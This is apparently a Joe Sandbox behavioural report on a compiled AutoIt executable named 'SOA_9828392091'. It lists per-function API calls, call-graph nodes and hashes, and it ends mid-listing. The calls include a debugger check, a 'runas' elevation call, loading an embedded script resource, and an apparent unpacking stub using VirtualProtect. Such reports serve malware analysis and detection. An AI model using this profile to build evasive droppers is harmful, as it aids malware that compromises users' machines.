9362d1 96675->96677 96676->96677 96678 950fa7 96677->96678 96679 950fb3 96678->96679 96680 951028 96678->96680 96687 950fd8 96679->96687 96727 957c0e 47 API calls __getptd_noexit 96679->96727 96729 95103a 59 API calls 4 library calls 96680->96729 96683 951035 96683->96556 96684 950fbf 96728 956e10 8 API calls __Wcsftime_l 96684->96728 96686 950fca 96686->96556 96687->96556 96688->96595 96690 93bdfa 48 API calls 96689->96690 96691 9361b1 96690->96691 96691->96647 96693 934517 83 API calls 96692->96693 96694 97c405 96693->96694 96695 97c56d 94 API calls 96694->96695 96696 97c417 96695->96696 96697 9344ed 64 API calls 96696->96697 96724 97c41b 96696->96724 96698 97c432 96697->96698 96699 9344ed 64 API calls 96698->96699 96700 97c442 96699->96700 96701 9344ed 64 API calls 96700->96701 96702 97c45d 96701->96702 96703 9344ed 64 API calls 96702->96703 96704 97c478 96703->96704 96705 934517 83 API calls 96704->96705 96706 97c48f 96705->96706 96707 95395c std::exception::_Copy_str 47 API calls 96706->96707 96708 97c496 96707->96708 96709 95395c std::exception::_Copy_str 47 API calls 96708->96709 96710 97c4a0 96709->96710 96711 9344ed 64 API calls 96710->96711 96712 97c4b4 96711->96712 96713 97bf5a GetSystemTimeAsFileTime 96712->96713 96714 97c4c7 96713->96714 96715 97c4f1 96714->96715 96716 97c4dc 96714->96716 96718 97c4f7 96715->96718 96719 97c556 96715->96719 96717 951c9d _free 47 API calls 96716->96717 96722 97c4e2 96717->96722 96720 97b965 118 API calls 96718->96720 96721 951c9d _free 47 API calls 96719->96721 96723 97c54e 96720->96723 96721->96724 96725 951c9d _free 47 API calls 96722->96725 96726 951c9d _free 47 API calls 96723->96726 96724->96663 96724->96665 96725->96724 96726->96724 96727->96684 96728->96686 96729->96683 96731 95f8a0 __ftell_nolock 96730->96731 96732 9340b4 GetLongPathNameW 96731->96732 96733 936a63 48 API calls 96732->96733 96734 9340dc 96733->96734 96735 9349a0 96734->96735 96736 93d7f7 48 API calls 96735->96736 96737 9349b2 96736->96737 96738 
93660f 49 API calls 96737->96738 96739 9349bd 96738->96739 96740 9349c8 96739->96740 96745 9a2e35 96739->96745

                                      Control-flow Graph

                                      [Control-flow graph node/edge listing for the function at 0x95b043 (rendered graph not captured). API nodes: GetConsoleMode, GetConsoleCP, WriteFile, GetLastError, WideCharToMultiByte]
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 055cdb899ce90b9075861d494802ff78cc9e30a08eefd9eba8b1f31beb8b1b4c
                                      • Instruction ID: c3747819ece5d1e0e2f32fee4d4501d67f64e0ffd8a9c01548cea2f0688e979e
                                      • Opcode Fuzzy Hash: 055cdb899ce90b9075861d494802ff78cc9e30a08eefd9eba8b1f31beb8b1b4c
                                      • Instruction Fuzzy Hash: 31326E75B022288FDB24CF55DC816E9B7B9FF4A311F1841D9E80AA7A91D7309E84CF52

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00933AA3,?), ref: 00933D45
                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,00933AA3,?), ref: 00933D57
                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,009F1148,009F1130,?,?,?,?,00933AA3,?), ref: 00933DC8
                                        • Part of subcall function 00936430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00933DEE,009F1148,?,?,?,?,?,00933AA3,?), ref: 00936471
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,00933AA3,?), ref: 00933E48
                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009E28F4,00000010), ref: 009A1CCE
                                      • SetCurrentDirectoryW.KERNEL32(?,009F1148,?,?,?,?,?,00933AA3,?), ref: 009A1D06
                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,009CDAB4,009F1148,?,?,?,?,?,00933AA3,?), ref: 009A1D89
                                      • ShellExecuteW.SHELL32(00000000,?,?,?,?,00933AA3), ref: 009A1D90
                                        • Part of subcall function 00933E6E: GetSysColorBrush.USER32(0000000F), ref: 00933E79
                                        • Part of subcall function 00933E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00933E88
                                        • Part of subcall function 00933E6E: LoadIconW.USER32(00000063), ref: 00933E9E
                                        • Part of subcall function 00933E6E: LoadIconW.USER32(000000A4), ref: 00933EB0
                                        • Part of subcall function 00933E6E: LoadIconW.USER32(000000A2), ref: 00933EC2
                                        • Part of subcall function 00933E6E: RegisterClassExW.USER32(?), ref: 00933F30
                                        • Part of subcall function 009336B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009336E6
                                        • Part of subcall function 009336B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00933707
                                        • Part of subcall function 009336B8: ShowWindow.USER32(00000000,?,?,?,?,00933AA3,?), ref: 0093371B
                                        • Part of subcall function 009336B8: ShowWindow.USER32(00000000,?,?,?,?,00933AA3,?), ref: 00933724
                                        • Part of subcall function 00934FFC: _memset.LIBCMT ref: 00935022
                                        • Part of subcall function 00934FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 009350CB
                                      Strings
                                      • runas, xrefs: 009A1D84
                                      • This is a third-party compiled AutoIt script., xrefs: 009A1CC8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                      • String ID: This is a third-party compiled AutoIt script.$runas
                                      • API String ID: 438480954-3287110873
                                      • Opcode ID: 2de1e11d7729c5eaf1cb94da4702fe672dcf21831cd98aa4636cef8b1017949b
                                      • Instruction ID: f63cadf3ec60bdf399181345809fd85b492afd703f422ffa499dcaa436e8edbd
                                      • Opcode Fuzzy Hash: 2de1e11d7729c5eaf1cb94da4702fe672dcf21831cd98aa4636cef8b1017949b
                                      • Instruction Fuzzy Hash: 28511530A4C248FBCB21ABF1DC41FFE7BB99B8A714F008124F241A21A2DA744A45DF61

                                      Control-flow Graph

                                      [Control-flow graph node/edge listing for the function at 0x933742 (rendered graph not captured). API nodes: NtdllDefWindowProc_W, PostQuitMessage, SetTimer, RegisterClipboardFormatW, KillTimer, CreatePopupMenu, MoveWindow, SetFocus]
                                      APIs
                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 009337B3
                                      • KillTimer.USER32(?,00000001), ref: 009337DD
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00933800
                                      • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0093380B
                                      • CreatePopupMenu.USER32 ref: 0093381F
                                      • PostQuitMessage.USER32(00000000), ref: 0093382E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                      • String ID: TaskbarCreated
                                      • API String ID: 157504867-2362178303
                                      • Opcode ID: dedd48758339a22574e95151653bbc778a6c0fc70572723989a79bd85301d12b
                                      • Instruction ID: 1cd30f453b3cb0fe3304ad58f7a774dba372abfce079ac9ff2b841a165904eae
                                      • Opcode Fuzzy Hash: dedd48758339a22574e95151653bbc778a6c0fc70572723989a79bd85301d12b
                                      • Instruction Fuzzy Hash: FE414DF52A824AE7DB246F28DD4EF7A3799F740300F048525F607D21A1DB649D50EFA2

                                      Control-flow Graph

                                      [Control-flow graph node/edge listing for the function at 0x94ddc0 (rendered graph not captured). API nodes: GetVersionExW, GetCurrentProcess, GetNativeSystemInfo, GetSystemInfo, FreeLibrary]
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 0094DDEC
                                      • GetCurrentProcess.KERNEL32(00000000,009CDC38,?,?), ref: 0094DEAC
                                      • GetNativeSystemInfo.KERNELBASE(?,009CDC38,?,?), ref: 0094DF01
                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0094DF0C
                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0094DF1F
                                      • GetSystemInfo.KERNEL32(?,009CDC38,?,?), ref: 0094DF29
                                      • GetSystemInfo.KERNEL32(?,009CDC38,?,?), ref: 0094DF35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                      • String ID:
                                      • API String ID: 3851250370-0
                                      • Opcode ID: b7ffa674f257732f1c7dd6ec87194d2b90d91ea52a872c383c2cebe444062a8a
                                      • Instruction ID: f58107e95e7d27b8824ebebce26d44c36276e6190936e47f39f23d5be69e90f2
                                      • Opcode Fuzzy Hash: b7ffa674f257732f1c7dd6ec87194d2b90d91ea52a872c383c2cebe444062a8a
                                      • Instruction Fuzzy Hash: 3661C0B581B384CFCF15CF6898C19EE7FB8AF6A300B1989D9D8459F207D624C908CB65

                                      Control-flow Graph

                                      [Control-flow graph node/edge listing for the function at 0x93406b (rendered graph not captured). API nodes: CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource]
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0093407B
                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0093449E,?,?,00000000,00000001), ref: 00934092
                                      • LoadResource.KERNEL32(?,00000000,?,?,0093449E,?,?,00000000,00000001,?,?,?,?,?,?,009341FB), ref: 009A4F1A
                                      • SizeofResource.KERNEL32(?,00000000,?,?,0093449E,?,?,00000000,00000001,?,?,?,?,?,?,009341FB), ref: 009A4F2F
                                      • LockResource.KERNEL32(0093449E,?,?,0093449E,?,?,00000000,00000001,?,?,?,?,?,?,009341FB,00000000), ref: 009A4F42
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                      • String ID: SCRIPT
                                      • API String ID: 3051347437-3967369404
                                      • Opcode ID: ff9a00ecd1055882da6d63e61bc509a6ca9e4b44e7ee3c2b7f638d1f75ea8456
                                      • Instruction ID: a3a6e75aca505a9bb0848a162118022b191b0014a55572ad4e7c8f072e7d697a
                                      • Opcode Fuzzy Hash: ff9a00ecd1055882da6d63e61bc509a6ca9e4b44e7ee3c2b7f638d1f75ea8456
                                      • Instruction Fuzzy Hash: 0C117070204701BFE7258B65ED48F277BBDEBC5B61F10412CF61286250DB71EC009A21

                                      Control-flow Graph

                                      [Control-flow graph node/edge listing for the function at 0xa55f70 (rendered graph not captured). API nodes: LoadLibraryA, GetProcAddress, ExitProcess, VirtualProtect (called twice)]
                                      APIs
                                      • LoadLibraryA.KERNEL32(?), ref: 00A560AA
                                      • GetProcAddress.KERNEL32(?,00A4EFF9), ref: 00A560C8
                                      • ExitProcess.KERNEL32(?,00A4EFF9), ref: 00A560D9
                                      • VirtualProtect.KERNELBASE(00930000,00001000,00000004,?,00000000), ref: 00A56127
                                      • VirtualProtect.KERNELBASE(00930000,00001000), ref: 00A5613C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                      • String ID:
                                      • API String ID: 1996367037-0
                                      • Opcode ID: 7910460ea75652dd409634807c7bc135f860178a6960760f3cb9bbc842a5b657
                                      • Instruction ID: a4d9ef3be9cd1a993a07fc5d145d0cf31d82c7121b8f6bcc33926172db800784
                                      • Opcode Fuzzy Hash: 7910460ea75652dd409634807c7bc135f860178a6960760f3cb9bbc842a5b657
                                      • Instruction Fuzzy Hash: 9951F7B2A557525BD7208FB8CC90660B7A4FB513267680738DEE2C73C6E7B45C0D8760
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,009A2F49), ref: 00976CB9
                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00976CCA
                                      • FindClose.KERNEL32(00000000), ref: 00976CDA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: FileFind$AttributesCloseFirst
                                      • String ID:
                                      • API String ID: 48322524-0
                                      • Opcode ID: 18c5978efc5370ae3fd1f84d1d6e5b67a020ecef6ca794cd0416f6803cb072cf
                                      • Instruction ID: 945abd97760056c2b04345dd2a05502b22d188a01ad13965ca6dd3b054605c40
                                      • Opcode Fuzzy Hash: 18c5978efc5370ae3fd1f84d1d6e5b67a020ecef6ca794cd0416f6803cb072cf
                                      • Instruction Fuzzy Hash: 44E0D832829811578214673CED0D4E9376CEA05339F104715F5F5C11D0F770ED0456D5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID:
                                      • API String ID: 3964851224-0
                                      • Opcode ID: f9907dc175f5363cd2188d50e4ec1eb52c8e9bd5b0f1c8aa096a79ed258a6ecd
                                      • Instruction ID: e252fe90723ee202bac27cc394c72f0e233449573f674592e145225879e8925b
                                      • Opcode Fuzzy Hash: f9907dc175f5363cd2188d50e4ec1eb52c8e9bd5b0f1c8aa096a79ed258a6ecd
                                      • Instruction Fuzzy Hash: 539277706083019FD724DF28C490F6ABBE5BF89304F14885DE99A8B3A2D775E945CB92
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0093E959
                                      • timeGetTime.WINMM ref: 0093EBFA
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0093ED2E
                                      • TranslateMessage.USER32(?), ref: 0093ED3F
                                      • DispatchMessageW.USER32(?), ref: 0093ED4A
                                      • LockWindowUpdate.USER32(00000000), ref: 0093ED79
                                      • DestroyWindow.USER32 ref: 0093ED85
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093ED9F
                                      • Sleep.KERNEL32(0000000A), ref: 009A5270
                                      • TranslateMessage.USER32(?), ref: 009A59F7
                                      • DispatchMessageW.USER32(?), ref: 009A5A05
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009A5A19
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                      • API String ID: 2641332412-570651680
                                      • Opcode ID: 6c0c0666d1835597a96c80f7caa88809cb9b21272a188f4cf71f868a5e6e15b1
                                      • Instruction ID: 9099bcec3c593fd831bc04ef8844d343c9925cec6ed9beb451e46e0956d86853
                                      • Opcode Fuzzy Hash: 6c0c0666d1835597a96c80f7caa88809cb9b21272a188f4cf71f868a5e6e15b1
                                      • Instruction Fuzzy Hash: 9662AF70608341DFDB25DF24C885BAA77E8BF85304F18496DF98A8B2D2DB759844CF92
                                      APIs
                                      • ___createFile.LIBCMT ref: 00965EC3
                                      • ___createFile.LIBCMT ref: 00965F04
                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00965F2D
                                      • __dosmaperr.LIBCMT ref: 00965F34
                                      • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00965F47
                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00965F6A
                                      • __dosmaperr.LIBCMT ref: 00965F73
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00965F7C
                                      • __set_osfhnd.LIBCMT ref: 00965FAC
                                      • __lseeki64_nolock.LIBCMT ref: 00966016
                                      • __close_nolock.LIBCMT ref: 0096603C
                                      • __chsize_nolock.LIBCMT ref: 0096606C
                                      • __lseeki64_nolock.LIBCMT ref: 0096607E
                                      • __lseeki64_nolock.LIBCMT ref: 00966176
                                      • __lseeki64_nolock.LIBCMT ref: 0096618B
                                      • __close_nolock.LIBCMT ref: 009661EB
                                        • Part of subcall function 0095EA9C: CloseHandle.KERNELBASE(00000000,009DEEF4,00000000,?,00966041,009DEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0095EAEC
                                        • Part of subcall function 0095EA9C: GetLastError.KERNEL32(?,00966041,009DEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0095EAF6
                                        • Part of subcall function 0095EA9C: __free_osfhnd.LIBCMT ref: 0095EB03
                                        • Part of subcall function 0095EA9C: __dosmaperr.LIBCMT ref: 0095EB25
                                        • Part of subcall function 00957C0E: __getptd_noexit.LIBCMT ref: 00957C0E
                                      • __lseeki64_nolock.LIBCMT ref: 0096620D
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00966342
                                      • ___createFile.LIBCMT ref: 00966361
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0096636E
                                      • __dosmaperr.LIBCMT ref: 00966375
                                      • __free_osfhnd.LIBCMT ref: 00966395
                                      • __invoke_watson.LIBCMT ref: 009663C3
                                      • __wsopen_helper.LIBCMT ref: 009663DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                      • String ID: @
                                      • API String ID: 3896587723-2766056989
                                      • Opcode ID: 66c2ebffbde7769ef39ba181537927ceecd2df8081eb80cfbf304209cd310f9e
                                      • Instruction ID: 3d508be7100da99221eaa03bd6079ccc4bd00f4a39ba2868722e9a98f2d9028a
                                      • Opcode Fuzzy Hash: 66c2ebffbde7769ef39ba181537927ceecd2df8081eb80cfbf304209cd310f9e
                                      • Instruction Fuzzy Hash: 2022887190460A9FEF299F68DC65BBD7B79EF41324F254229E821EB2D2C3398D40C791
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __getptd_noexit
                                      • String ID:
                                      • API String ID: 3074181302-0
                                      • Opcode ID: edd53d8981a0e216fe18df01e6f0ca09a5d77b0b7edfdee791054529ed995724
                                      • Instruction ID: 4afc14bde6134e2a8f806badcc1fae46c082c6236d3b85f9275e2c265e6c0ede
                                      • Opcode Fuzzy Hash: edd53d8981a0e216fe18df01e6f0ca09a5d77b0b7edfdee791054529ed995724
                                      • Instruction Fuzzy Hash: 4D328A70A08241CFDB21CF69D850BBDBBB5AF85331F284469EC959F292D7709D4ACB60

                                      Control-flow Graph

                                      APIs
                                      • _wcscpy.LIBCMT ref: 0097FA96
                                      • _wcschr.LIBCMT ref: 0097FAA4
                                      • _wcscpy.LIBCMT ref: 0097FABB
                                      • _wcscat.LIBCMT ref: 0097FACA
                                      • _wcscat.LIBCMT ref: 0097FAE8
                                      • _wcscpy.LIBCMT ref: 0097FB09
                                      • __wsplitpath.LIBCMT ref: 0097FBE6
                                      • _wcscpy.LIBCMT ref: 0097FC0B
                                      • _wcscpy.LIBCMT ref: 0097FC1D
                                      • _wcscpy.LIBCMT ref: 0097FC32
                                      • _wcscat.LIBCMT ref: 0097FC47
                                      • _wcscat.LIBCMT ref: 0097FC59
                                      • _wcscat.LIBCMT ref: 0097FC6E
                                        • Part of subcall function 0097BFA4: _wcscmp.LIBCMT ref: 0097C03E
                                        • Part of subcall function 0097BFA4: __wsplitpath.LIBCMT ref: 0097C083
                                        • Part of subcall function 0097BFA4: _wcscpy.LIBCMT ref: 0097C096
